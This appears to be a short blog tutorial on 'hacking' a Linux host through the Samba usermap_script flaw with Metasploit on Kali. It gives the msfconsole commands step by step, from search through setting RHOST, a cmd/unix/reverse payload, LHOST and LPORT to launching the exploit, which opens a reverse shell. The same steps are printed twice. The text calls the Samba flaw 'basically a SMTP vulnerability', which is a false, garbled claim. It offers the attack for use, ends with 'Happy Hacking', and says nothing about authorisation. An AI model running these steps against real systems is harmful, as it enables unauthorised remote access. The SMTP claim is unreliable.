In this tutorial we are going to explain how to hack a linux operating system with samba vulnerability. It is basically a SMTP vulnerability and SMTP is also applicable.
Open kali Linux terminal, enter the following commands to start the Metasploit framework
service postgresql start
msfconsole
Search for an exploit using usermap_script
Search usermap_script
To configure exploit, enter the below command
use <exploit path>
To view exploit options, execute show options
To configure RHOST, use set command
set RHOST <IP address>
to list suitable payloads for configured exploit, execute show payloads
To configure payload, set PAYLOAD cmd/unix/reverse
to view payload options, show options
to configure Payloads options, set LHOST <IP address> and set LPORT <Port No>
if all options are properly configured then exploit
By executing the above you can hack a linux operating system if there is samba vulnerability.
Happy Hacking:)
Open kali Linux terminal, enter the following commands to start the Metasploit framework
service postgresql start
msfconsole
Search for an exploit using usermap_script
Search usermap_script
To configure exploit, enter the below command
use <exploit path>
To view exploit options, execute show options
To configure RHOST, use set command
set RHOST <IP address>
to list suitable payloads for configured exploit, execute show payloads
To configure payload, set PAYLOAD cmd/unix/reverse
to view payload options, show options
to configure Payloads options, set LHOST <IP address> and set LPORT <Port No>
if all options are properly configured then exploit
By executing the above you can hack a linux operating system if there is samba vulnerability.
Happy Hacking:)
No comments:
Post a Comment